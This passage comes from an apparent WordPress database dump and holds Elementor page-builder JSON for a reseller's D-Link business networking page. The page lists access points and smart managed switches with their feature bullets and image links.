Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"222\",\"right\":\"222\",\"bottom\":\"222\",\"left\":\"222\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"81\",\"right\":\"81\",\"bottom\":\"81\",\"left\":\"81\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7311,3373,'_elementor_version','2.5.14'),(7312,3373,'_elementor_edit_mode','builder'),(7315,3374,'_wp_page_template','template-fullwidth.php'),(7316,3374,'_elementor_template_type','post'),(7317,3374,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"220\",\"right\":\"220\",\"bottom\":\"220\",\"left\":\"220\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; 